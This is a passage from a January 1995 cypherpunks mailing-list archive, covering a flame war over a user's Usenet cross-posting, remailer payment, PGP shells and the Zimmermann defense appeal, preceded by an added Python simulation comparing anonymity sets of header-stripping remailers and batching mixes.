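The distinction drawn in the message above, between stripping headers and actually mixing, as an added example that is not part of the original post. It assumes a passive observer who sees only message timing on every link (contents are taken to be encrypted and unlinkable, links have zero delay); the function names and the sample traffic are constructed for illustration.

```python
import random

def fifo_remailer(arrivals, latency=1):
    """Strips headers only: every message leaves `latency` after it arrived, in order."""
    return [(t + latency, sender) for t, sender in arrivals]

def batch_mix(arrivals, batch_size, rng):
    """Batching mix: hold messages until batch_size are pooled, shuffle, flush together."""
    out, pool = [], []
    for t, sender in sorted(arrivals):
        pool.append(sender)
        if len(pool) == batch_size:
            rng.shuffle(pool)
            out.extend((t, s) for s in pool)
            pool = []
    return out  # an unfilled final pool is simply never flushed in this model

def observe(arrivals, departure_times):
    """Passive timing observer on one remailer.

    arrivals: list of (time, candidate_senders) for each incoming message.
    Returns (time, candidate_senders) per outgoing message: every sender the
    observer cannot rule out from timing alone.
    """
    events = [(t, 0, c) for t, c in arrivals] + [(t, 1, None) for t in departure_times]
    events.sort(key=lambda e: (e[0], e[1]))  # arrivals before departures at equal times
    pool, result, i = [], [], 0
    while i < len(events):
        t, kind, cands = events[i]
        if kind == 0:
            pool.append(cands)
            i += 1
            continue
        j = i
        while j < len(events) and events[j][0] == t and events[j][1] == 1:
            j += 1
        n_out = j - i
        possible = frozenset().union(*pool)
        result.extend((t, possible) for _ in range(n_out))
        if n_out == len(pool):   # remailer is provably empty again
            pool = []
        i = j
    return result

def trace(hops, traffic):
    """Send traffic through a chain of remailers while the observer watches every link.
    Returns (true_sender, candidate_senders) for each delivered message."""
    seen = [(t, frozenset([s])) for t, s in traffic]
    msgs = list(traffic)
    for hop in hops:
        msgs = sorted(hop(msgs), key=lambda m: m[0])
        seen = observe(seen, [t for t, _ in msgs])
    return [(sender, cands) for (_, sender), (_, cands) in zip(msgs, seen)]

def smallest_anonymity_set(hops, traffic):
    return min(len(cands) for _, cands in trace(hops, traffic))

# Constructed sample traffic: one message every 10 time units.
TRAFFIC = [(0, "alice"), (10, "bob"), (20, "carol"),
           (30, "dave"), (40, "erin"), (50, "frank")]

def demo(seed=1995):
    rng = random.Random(seed)
    fifo = lambda m: fifo_remailer(m, latency=1)
    mix = lambda m: batch_mix(m, batch_size=3, rng=rng)
    chains = {"fifo": [fifo], "fifo,fifo": [fifo, fifo], "mix": [mix],
              "fifo,mix": [fifo, mix], "mix,mix": [mix, mix]}
    return {name: smallest_anonymity_set(hops, TRAFFIC) for name, hops in chains.items()}

if __name__ == "__main__":
    for name, size in demo().items():
        print(f"{name:10s} smallest anonymity set = {size}")
```

Chaining header-stripping remailers never raises the anonymity set above 1, while a single batching hop anywhere in the chain raises it to the batch size, and a second batching hop fed by the first adds nothing further against this observer.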




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter F Cassidy <pcassidy@world.std.com>
Date: Fri, 6 Jan 95 20:11:53 PST
To: "L. Todd Masco" <cactus@hks.net>
Subject: Re: Peter D. Lewis
In-Reply-To: <199501070053.TAA00768@bb.hks.net>
Message-ID: <Pine.3.89.9501062325.B10171-0100000@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain


wired has balls. the economist has to figure out what all this stuff 
means in the real world. wired just sells ads around the events it 
covers. lewis is innocent compared to wanton scum like kelly. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Fri, 6 Jan 95 20:13:43 PST
To: cypherpunks@toad.com
Subject: Carol Anne Whoever
Message-ID: <ab33c51401021004a87a@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


I don't care very much about Carol Anne whoever.  I don't care very much
about her plight.
I have received just enough information about her plight (via this list,
oddly enough), to know that I don't have enough information to tell who I
agree with in this dispute.  I don't particularly want to get enough
information to do that, because I don't care.  If I did care, I would get
the information through some other method than this list, because it seems
completely inappropriate.

The merits of netcom vs. smaller services seem irrelevant to this list,
too, in my mind, and I don't care to see those either.  If you were
wondering.

I also don't care to see 10 or 20 posts a day by Carol Anne Whoever which
are responses to random crypto-related posts wherein the whole post is
quoted, and then Carol Anne adds "me too!", or "Does that remind you of a
certain sysadmin? giggle, giggle.", or "Good point!"  I am at a loss as to
why Carol Anne thinks the details of her life, and her inane "me too"s are
of interest to the cypherpunks list.  I guess we can't stop Carol Anne from
sending this stuff to the list anyways (but I can killfile her), but it
would be nice if people would stop responding to her stuff.  Obviously if
you really feel it's an appropriate use of the list to do so anyway, I
can't stop you.  I'm just asking you to for purely selfish reasons, so I
don't feel the need to killfile people who make otherwise intelligent
posts, and miss those posts.

[I'm beginning to suspect that Carol Anne, and her sysadmin too, are just
tentacles of Detweiler.]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Fri, 6 Jan 95 22:26:18 PST
To: cactus@seabsd.hks.net (L. Todd Masco)
Subject: Re: Files and mail
In-Reply-To: <199501070607.BAA04310@bb.hks.net>
Message-ID: <m0rQUbx-0004IOC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


> Anybody want to offer odds on whether or not this merry little exchange
> will be reported in Wired as news?

No bet. ;)  The computer press is pretty immature, they'll report almost
anything.

Personally, I think both Carol Anne Braddock and Mike Horwath BOTH need to
grow up, along with a substantial number of the snipers and slammers and
back-seat-driver commentators regarding this thread.

Maybe they ought to restrict net access by age?  25 or so oughta be a good
age ... anyone younger is barred from access, or unless they provide
evidence that they have a maturity level greater than that of your average
six-year-old.
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager

Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

"What's the use of distant travel if only to discover - you're homeless in
your heart."  --Basia, "Yearning"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: No Taxes through No Government <schirado@lab.cc.wmich.edu>
Date: Fri, 6 Jan 95 20:26:33 PST
To: cypherpunks@toad.com
Subject: Re: Outlawing Anonymity
Message-ID: <199501070427.XAA02486@grog.lab.cc.wmich.edu>
MIME-Version: 1.0
Content-Type: text


TC May writes:

>I see no prospect whatsoever that a ban on anonymous mail could be
>implemented, enforced, or upheld in the courts.

Never say never.

Even coming from Tim, this surprises me just a little. Never
think that government won't do something. The effectiveness
of their 'solution' may be minimal, but billions can be
wasted, and countless lives ruined, before it can be stopped (or
more likely, dammed; once government achieves power, it is loath
to relinquish it without a death struggle).

Some nation's groups of 'leader'-thugs may be in a better
position than others to go for such a power grab at this moment
in time. But any and all of them should be constantly scrutinized
for the inevitable slide down that slippery slope. The "article"
by our pal Martha which the SF Chronicle had the poor judgment
and atrociously swollen cojones to publish, is one of the most
dramatically explicit warning signs of the year so far... and NOT
because the year is yet so young.

And to think, Tim used to be the pessimist on this list, saved only
by the reassurances of Duncan and Sandy... :-S




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nissim@acs.bu.edu
Date: Fri, 6 Jan 95 20:48:25 PST
To: pcassidy@world.std.com
Subject: Re: Peter D. Lewis
Message-ID: <199501070438.XAA101470@acs.bu.edu>
MIME-Version: 1.0
Content-Type: text/plain


I'm unfamiliar with what it is people have against Kevin Kelly.
Why "wanton scum"?  people might want to send mail not cc:ed to
cypherpunks to keep the list from experiencing too much of a burden
here.

-A




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: doumakes@netcom.com (Don Doumakes)
Date: Fri, 6 Jan 95 21:55:59 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Abuse
Message-ID: <199501070554.VAA14679@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> One thing to keep in mind, though, is that it's really the _last_ remailer
> in the chain that's taking the most heat, and it would be nice if they got
> payed.  There's also an issue of some remailers refusing to be last in the
> chain, so they dont' expose themselves so much.

I agree, this is an important issue.  But I think it's a separate one
from the question of how users pay for the service.  In other words,
once there's a consensus to have a Guild of for-pay remailers, all the
users should have to do is pay the Guild once.  The Guild can then
haggle over how to divvy up the money.  Hard jobs, such as posting anon
news, should command more money.

On the issue of the medium of exchange, I favor blinded digital cash
with its absolute anonymity.  The "remailer in a box" that we spoke of
earlier would do well to include this capability.

- --
______________________________________________________________________
Don Doumakes             Finger doumakes@netcom.com for PGP public key

Foxpro databases built to your specifications.  Email me for details.

-----BEGIN PGP SIGNATURE-----
Version: 2.6

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Fri, 6 Jan 95 21:13:17 PST
To: cypherpunks@toad.com
Subject: Netcom is not a good example (Was: Re: Files and mail)
In-Reply-To: <199501070010.QAA02210@netcom10.netcom.com>
Message-ID: <Pine.SUN.3.91.950107000218.29538D-100000@unix2.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Jan 1995, Mike Duvos wrote:

[ big monolithic service providers like Nyetcom are the best and will 
crush all you piddly little upstart ISPs ]

> Big service providers like Netcom don't interfere with customer
> use of the resources they sell, except when network functionality
> is impacted.  Even in such cases, they try to reach an
> understanding with the user, and terminate accounts only as a
> last resort.  Accounts don't vanish when "the guy who owns the
> machine" decides to throw a tantrum.

	Yeah. They only kill accounts when people criticize NetCruiser. :-P

	Nyetcom is hardly an example of a quality service provider. They
suffer periodic long term news and email delays; their service personnel
are rude, slow, and unprofessional (read: Bruce Woodcock & the above
incident); their security has been compromised countless times; their FTP
server is constantly overloaded; their toy software NetCruiser generates
nonconformant Usenet articles; their 18 (!) machines are so constantly
overloaded that it takes a good five minutes to respond to a finger
request; they have no http:// support. They are home to some of the most
infamous net.kooks and net.cretins (like Tom Servo, currently), and their
net.reputation sucks.  Frankly, I'd rather have a Winternet account than a
Netcom account. 

ObCypherpunks: sameer's system, the Community Connexion, suffers *none* 
of these problems. http://www.c2.org or <info@c2.org> for more 
information. sameer supports PGP and the running of anonymous remailers 
on his system. Check it out, send him money.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. Todd Masco" <cactus@hks.net>
Date: Fri, 6 Jan 95 21:52:52 PST
To: cypherpunks@toad.com
Subject: Re: Peter D. Lewis
Message-ID: <199501070558.AAA04212@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Tim sez:
 > I think Kelly is a person of high integrity. It's hard to demand much
 > more than this.

I simply can't think much of a magazine that has cover stories deriving
entirely from kiddie-kracker squabbles.

Kelly may have plenty of integrity but that's not the word that the
magazine "Wired" usually brings to mind.  It's not the profit motive or
the ads that get me: running a business, I know you can't be picky about
who you take money from. It's the lack of meaningful content that annoys
me.  As with Lewis, frequently when they're discussing something I know
something about their stories are fraught with inaccuracies and rumours.
My personal favorite is when they list reporters among the "experts" on
their technology-watch light bites.

Their entire approach is to cast 

Like "Seventeen," "Wired" should prepend "don't you wish you were" to
its title.
- --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLw4tbioZzwIn1bdtAQEM7gF9EZE2qciEPOqQTYjwiqDF9vakwzSS3DSh
ZJy1S0gTP7kNSTDnm/8UuoVOxehFhJ+X
=g0sd
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (L. Todd Masco)
Date: Fri, 6 Jan 95 22:02:08 PST
To: cypherpunks@toad.com
Subject: Re: Files and mail
Message-ID: <199501070607.BAA04310@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----


Anybody want to offer odds on whether or not this merry little exchange
will be reported in Wired as news?
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLw4vqSoZzwIn1bdtAQER/QF/SkRQGEEjHn+E0SZEiWs0McAvRccuzxFQ
Uv76Kmmya6EMxTJOJFtatP1uQ7V6JmSA
=g1Bd
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. Todd Masco" <cactus@hks.net>
Date: Fri, 6 Jan 95 22:10:57 PST
To: cypherpunks@toad.com
Subject: Re: Too Much!
Message-ID: <199501070616.BAA04394@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----


In article <Pine.NXT.3.91.950106202333.12708A-100000@kisa> you write:
>  Yet again I have un-subbed from the list because of the S/N ratio. And 
>things were looking so good there for a while.

You might want to try reading it from NNTP, via c2.org or hks.net.  You
can then use Kill files.

Wonderful beasts, those.

(And if more people do this, we could actually try to use some
 distributed mechanisms such as that that strn uses.)
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLw4xuCoZzwIn1bdtAQHTNgF/T9OR6yUCu05KZW4s3MSHptRoclc31xO8
5O0jAXDA0c9oE/39smLZ++I6OoGh7Wiq
=5/FC
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Fri, 6 Jan 95 23:18:51 PST
To: "Paul J. Ste. Marie" <pstemari@erinet.com>
Subject: Soapbox mode on!(but short)
In-Reply-To: <9501062310.AB20311@eri.erinet.com>
Message-ID: <Pine.3.89.9501070144.A14739-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Paul J. Ste. Marie,

I was quietly going through my mail after an eight hour layoff.
The first thing you do is lie.

I have called you a liar. Point Blank!

And for the honor of this very list, so that there is some
credibility, I shall retrieve from a tin reader the actual
posting, COMPLETE WITH HEADER.  

And what makes creeps like you going is the ability to continue,
to spread those lies. 

[soapbox mode on]

THE POSTING WENT UNANSWERED FOR 3 DAYS IN 10 NEWSGROUPS.

UNANSWERED...NADA ...NO BYTES...NO BITS.....NO ANYTHING

THE FIRST PERSON TO RESPOND WAS HORWATH, ISSUING SOME KIND

OF REALLY LAME APOLOGY...TO WHOM NO ONE KNOWS, FOR NO ONE

HAD RESPONDED....GET IT....CAN YOU HANDLE PLAIN ENGLISH?

NO MR. STE. MARIE I WILL NOT START RUMOR OR CONTINUE RUMOR.

YOU HAVE LIED TO THE FINE PEOPLE OF CYPHERPUNK LIST.

YOU HAVE WASTED THEIR TIME AND THEIR BANDWIDTH (THEIR LIFE)

FOR THE MOST IMPORTANT CODE YOU CAN EVER WRITE IS THE TRUTH.

[soapbox mode off]

Please pardon me now, while I retrieve the actual postings.

Love Always,

Carol Anne

On Fri, 6 Jan 1995, Paul J. Ste. Marie wrote:

> At 08:58 AM 1/6/95 +0000, Nesta Stubbs wrote:
> >On Fri, 6 Jan 1995, Carol Anne Braddock wrote:
> > ... 
> >> I "crossposted" it to my favorite 10 newsgroups. Just 10.
> >> Some creep complained. (we'll get to him a bit later).
> >>
> >ten is not a large number when it comes to cross-posting on some topics, I 
> >can think of at least twenty newsgroups where the PRZ letters and such 
> >would make a lot of sense and be on topic.  This just goes to show the 
> >sometimes reactionary steps people take to control spamming.  ...
> 
> The discussion on alt.current-events.net-abuse seemed to indicate that the 
> claim of "Just 10" above is a slight understatement.  The newsgroups seem to 
> have been hit alphabetically, and I believe the total count was in the hundreds.
> 
>     --Paul J. Ste. Marie
>       pstemari@well.sf.ca.us, pstemari@erinet.com
> 
> 

Signature withdrawn at the request (pretty rightfully 
so) of my dear friends on the Cypherpunk List 
Coming Soon: The Internet Debut of CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock <carolann@vortex.mm.com>
Date: Sat, 7 Jan 1995 01:26:50 -0600
To: carolann@vortex.mm.com
Subject: (fwd) Re: Phil Zimmermann
Message-ID: <283c371c68a89a4d2ae07bc0ed855b15@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain


Organization: Minnesota MicroNet, St. Paul, MN

Path: vortex.mm.com!news2.mr.net!mr.net!winternet.com!drechsau
From: drechsau@winternet.com (Mike Horwath)
Newsgroups: soc.support.transgendered,alt.transgendered,mn.general,alt.sex.femdom,alt.artcom,alt.sex.bondage,alt.sex,comp.infosystems.www.users,alt.dreams.lucid,alt.dreams
Subject: Re: Phil Zimmermann
Followup-To: soc.support.transgendered,alt.transgendered,mn.general,alt.sex.femdom,alt.artcom,alt.sex.bondage,alt.sex,comp.infosystems.www.users,alt.dreams.lucid,alt.dreams
Date: 5 Jan 1995 23:57:09 GMT
Organization: StarNet Communications, Inc
Lines: 12
Message-ID: <3ei10l$mvo@blackice.winternet.com>
References: <3dtkaj$lg8@news-2.csn.net> <3dvdsb$ads$1@mhade.production.compuserve.com> <mpjD1MvLD.4Ht@netcom.com> <Pine.SUN.3.91.950102035552.23484I-100000@icicle.winternet.com>
NNTP-Posting-Host: icicle.winternet.com
X-Newsreader: TIN [version 1.2 PL2]

We wish to apologize for Carol Anne's actions while with Winternet.

This account has been deleted for breach of our AUP.

Questions, comments, problems or general bitching, please reply to this
message.

--
Mike Horwath    IRC: Drechsau    LIFE: Lover     drechsau@winternet.com
Winternet:  info@winternet.com              root@jacobs.mn.org <- Linux!
Twin Cities area Internet Access:  612-941-9177 for more info
Founding member of Minnesota Coalition for Internet Accessibility

--
Signature withdrawn at the request (pretty rightfully 
so) of my dear friends on the Cypherpunk List 
Coming Soon: The Internet Debut of CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock <carolann@vortex.mm.com>
Date: Sat, 7 Jan 1995 01:26:51 -0600
To: carolann@vortex.mm.com
Subject: (fwd) Re: Phil Zimmermann
Message-ID: <1e5cdf203746b1a0144dbaf6df3710d1@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain


Path: vortex.mm.com!news2.mr.net!mr.net!skypoint.com!jlogajan
From: jlogajan@skypoint.com (John Logajan)
Newsgroups: mn.general
Subject: Re: Phil Zimmermann
Date: 6 Jan 1995 05:09:12 GMT
Organization: SkyPoint Communications, Inc.
Lines: 13
Message-ID: <3eij9o$8nu@stratus.skypoint.net>
Reply-To: jlogajan@skypoint.com
NNTP-Posting-Host: mirage.skypoint.com
X-Newsreader: TIN [version 1.2 PL2]

Mike Horwath (drechsau@winternet.com) wrote:
: We wish to apologize for Carol Anne's actions while with Winternet.
: This account has been deleted for breach of our AUP.
: Questions, comments, problems or general bitching, please reply to this
: message.

Since you are publicly accusing Carol Anne of "breach of our AUP", you
better explain what horrible crime she committed.

--
 - John Logajan -- jlogajan@skypoint.com  --  612-633-0345 -
 - 4248 Hamline Ave; Arden Hills, Minnesota (MN) 55112 USA -
 - WWW URL =  http://www.skypoint.com/subscribers/jlogajan -

--
Signature withdrawn at the request (pretty rightfully 
so) of my dear friends on the Cypherpunk List 
Coming Soon: The Internet Debut of CENSORED.COM




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock <carolann@vortex.mm.com>
Date: Sat, 7 Jan 1995 01:26:52 -0600
To: carolann@vortex.mm.com
Subject: (fwd) Re: Phil Zimmermann
Message-ID: <d7eace1bb17a682f21e5e70b53d0e1c8@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain


Path: vortex.mm.com!news2.mr.net!mr.net!winternet.com!news
From: "Mr.Fish" <mwalleye@winternet.com>
Newsgroups: soc.support.transgendered,alt.transgendered,mn.general,alt.sex.femdom,alt.artcom,alt.sex.bondage,alt.sex,comp.infosystems.www.users,alt.dreams.lucid,alt.dreams
Subject: Re: Phil Zimmermann
Date: 6 Jan 1995 05:39:51 GMT
Organization: StarNet Communications, Inc
Lines: 16
Message-ID: <3eil37$6a@blackice.winternet.com>
References: <3dtkaj$lg8@news-2.csn.net> <3dvdsb$ads$1@mhade.production.compuserve.com> <mpjD1MvLD.4Ht@netcom.com> <Pine.SUN.3.91.950102035552.23484I-100000@icicle.winternet.com> <3ei10l$mvo@blackice.winternet.com>
NNTP-Posting-Host: mwalleye.winternet.com

> We wish to apologize for Carol Anne's actions while with Winternet.
> 
> This account has been deleted for breach of our AUP.
> 
> Questions, comments, problems or general bitching, please reply to this
> message.
> 
> --
> Mike Horwath    IRC: Drechsau    LIFE: Lover     drechsau@winternet.com


Looking at the groups that you cross-posted, I sure as heck would like to 
know what she did to get kicked off?;) What the heck do you have to 
apologize for Mike? Unless you might have been involved too?;) I told you
you've been working too hard.
Come on now bud, give us the lowdown!

--
Signature withdrawn at the request (pretty rightfully 
so) of my dear friends on the Cypherpunk List 
Coming Soon: The Internet Debut of CENSORED.COM







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RopeGun@calvino.alaska.net (Oren Tanay)
Date: Sat, 7 Jan 95 01:59:39 PST
To: cypherpunks@toad.com
Subject: pgp shells for windows....
Message-ID: <Chameleon.950107014244.RopeGun@RopeGun.alaska.net>
MIME-Version: 1.0
Content-Type: text/plain


I've read the pgp docs and several other unofficial documents on pgp and I have come to the conclusion
that a shell for pgp is the most sensible approach using such a powerful encryption program.  I've
searched to the best of my abilities and have found several pgp shells for windows, but all of them seem to
assume that the user has an above average understanding of the workings of pgp and all of its uses.  At
this point you're probably thinking that I'm looking for an easy way to get around learning pgp the hard way,
but I'm not...   the whole idea of pgp is that privacy and security be available to anyone, using any platform.
But ease of use was not really one of the features built into pgp.  If anyone can refer me to a windows
shell for pgp (for dummies :-)   ) I would like to get a copy of it for distribution on the bulletin board nets...
   Was I too verbose?
          \\|||||||//
           | o o |     Oren Tanay
           |   J   |     RopeGun@alaska.net
             \---        www.alaska.net/~RopeGun/RopeGun.html 

"My Cat Can Eat A Whole WaterMelon"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RopeGun@calvino.alaska.net (Oren Tanay)
Date: Sat, 7 Jan 95 02:21:34 PST
To: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Subject: Re: pgp shells for windows....
Message-ID: <Chameleon.950107020459.RopeGun@RopeGun.alaska.net>
MIME-Version: 1.0
Content-Type: text/plain


winpgp2.6 was the most successful pgp shell I could find but the interface was stale and nondescript.
Including the fact that when it executed the commands it opened a window and I was interfacing with the
dos pgp interface, I found that a little redundant for a shell program; but then again I'm not sure if an
interface with pgp can be done any other way.
          \\|||||||//
           | o o |     Oren Tanay
           |   J   |     RopeGun@alaska.net
             \---        www.alaska.net/~RopeGun/RopeGun.html 

"My Cat Can Eat A Whole WaterMelon"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Fri, 6 Jan 95 23:59:11 PST
To: Cypherpunks@toad.com
Subject: From me to me to you...The Actual Article
Message-ID: <Pine.3.89.9501070130.A14788-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear All of You,

This is the article, and what I did with it. It is complete in its
entirety, from the bang paths, to the crosspostings. Please study them
carefully, for my next post will contain the first response to the article,
three days later. ALL DURING THIS TIME, I WAS LED TO BELIEVE, THROUGH PHONE
CALLS THAT THIS WAS "GOING TO BE INVESTIGATED SOON". NOTHING OF THE SORT
HAPPENED. NO ONE IN ANY OF THE TEN GROUPS RAISED A SINGLE OBJECTION. PERIOD.

             I believe in your capacity to fairly judge.

               My response to the first complaint lies 
               
                  still censored in my mail reader.
                     
                    For if .1% of all the Usenet

                         is inappropriate to

                            post to, when

                               will it
                             
                                become

                                 just

                                 .01%
                                  ?
Now, the article,



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock <carolann@vortex.mm.com>
Date: Sat, 7 Jan 1995 01:26:26 -0600
To: carolann@vortex.mm.com
Subject: (fwd) Re: Phil Zimmermann
Message-ID: <53ae08506afed0671ca88cb1b531a06e@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain


Path: vortex.mm.com!news2.mr.net!mr.net!umn.edu!spool.mu.edu!howland.reston.ans.net!pipex!uunet!winternet.com!icicle.winternet.com!carolann
From: Carol Anne Braddock <carolann@icicle.winternet.com>
Newsgroups: soc.support.transgendered,alt.transgendered,mn.general,alt.sex.femdom,alt.artcom,alt.sex.bondage,alt.sex,comp.infosystems.www.users,alt.dreams.lucid,alt.dreams
Subject: Re: Phil Zimmermann
Date: Mon, 2 Jan 1995 04:05:13 -0600
Organization: StarNet Communications, Inc
Lines: 317
Message-ID: <Pine.SUN.3.91.950102035552.23484I-100000@icicle.winternet.com>
References: <3dtkaj$lg8@news-2.csn.net> <3dvdsb$ads$1@mhade.production.compuserve.com> <mpjD1MvLD.4Ht@netcom.com>
NNTP-Posting-Host: icicle.winternet.com
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
In-Reply-To: <mpjD1MvLD.4Ht@netcom.com> 


Please read, and help if you can.
You can get PGP at my WWW HomePage.
http://www.winternet.com/~carolann

Love Always,

Carol Anne
Registered<BETSI>BEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock   "Give me your Tired, your Poor, your old PC's..."
The TS NET                               REGISTERED PGP KEY NO.0C91594D     
carolann@icicle.winternet.com       finger carolann@winternet.com |more
***********************************************************************
My WWW Homepage Page is at:    http://www.winternet.com/~carolann


On Fri, 30 Dec 1994, Michael Paul Johnson wrote:

> Christopher W. Geib <72144.1426@CompuServe.COM> writes:
> 
> >Phil,
> 
> >Could you repost here the address where we can send our support?
> 
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> 
>             Phil Zimmermann Legal Defense Fund Appeal
> 
>     In November, 1976, Martin Hellman and Whitfield Diffie announced
> their discovery of public-key cryptography by beginning their paper
> with the sentence: "We stand today on the brink of a revolution in
> cryptography."
> 
>     We stand today on the brink of an important battle in the
> revolution they unleashed.  Philip Zimmermann, who encoded and released
> the most popular and successful program to flow from that discovery,
> Pretty Good Privacy ("PGP"), may be about to go to court.
> 
>     It has been over fourteen months now since Phil was first informed
> that he was the subject of a grand jury investigation being mounted by
> the San Jose, CA, office of US Customs into the international
> distribution, over the Internet, of the original version of the
> program.  On January 12th, Phil's legal team will meet for the first
> time with William Keane, Assistant US Attorney for the Northern
> District of California, who is in charge of the grand jury
> investigation, in San Jose.  An indictment, if one is pursued by the
> government after this meeting, could be handed down very shortly
> thereafter.
> 
>     If indicted, Phil would likely be charged with violating statute 22
> USC 2778 of the US Code, "Control of arms exports and imports."  This
> is the federal statute behind the regulation known as ITAR,
> "International Traffic in Arms Regulations," 22 CFR 120.1 et seq. of
> the Code of Federal Regulations.  Specifically, the indictment would
> allege that Phil violated 22 USC 2778 by exporting an item listed as a
> "munition" in 22 CFR 120.1 et seq. without having a license to do so.
> That item is cryptographic software -- PGP.
> 
>     At stake, of course, is far more than establishing whether Phil
> violated federal law or not.  The case presents significant issues and
> will establish legal precedent, a fact known to everyone involved.
> According to his lead counsel, Phil Dubois, the US government hopes to
> establish the proposition that anyone having anything at all to do with
> an illegal export -- even someone like Phil, whose only involvement was
> writing the program and making it available to US citizens and who has
> no idea who actually exported it -- has committed a federal felony
> offense.  The government also hopes to establish the proposition that
> posting a "munition" on a BBS or on the Internet is exportation.  If
> the government wins its case, the judgment will have a profound
> chilling effect on the US software industry, on the free flow of
> information on the emerging global networks, and in particular upon the
> grassroots movement to put effective cryptography in the hands of
> ordinary citizens.  The US government will, in effect, resurrect
> Checkpoint Charlie -- on the Information Superhighway.
> 
>     By now, most of us who are reading this know about Phil and the
> case, whether by having the program and reading the doc files or by
> seeing reports in the Wall Street Journal, Time, Scientific American,
> the New York Times, Wired, US News and World Report, and hundreds of
> other news outlets; on Usenet groups like talk.crypto.politics or
> alt.security.pgp; or by listening to Phil give talks such as the one he
> gave at CFP '94 in Chicago.  We know that PGP has made great strides
> since version 1.0, and is now a sophisticated encryption and
> key-management package which has become the de facto standard in both
> micro and mainframe environments.  We know that Phil and the PGP
> development team successfully negotiated a commercial license with
> Viacrypt, and, through the efforts of MIT, a noncommercial license for
> PGP with RSA Data Security, the holders of the patent on the RSA
> algorithm on which PGP is based, thus freeing the program from the
> shadow of allegations of patent infringement.  We know that programs
> such as PGP represent one of our best bulwarks in the Information Age
> against the intrusions of public and private information gatherers.  We
> know that PGP is a key tool in insuring that the "Information
> Superhighway" will open the world to us, without opening us to the
> world.
> 
>     What we may not all know is the price Phil has had to pay for his
> courage and willingness to challenge the crypto status quo.  For years
> now Phil has been the point man in the ongoing campaign for freely
> available effective cryptography for the everyday computer user.  The
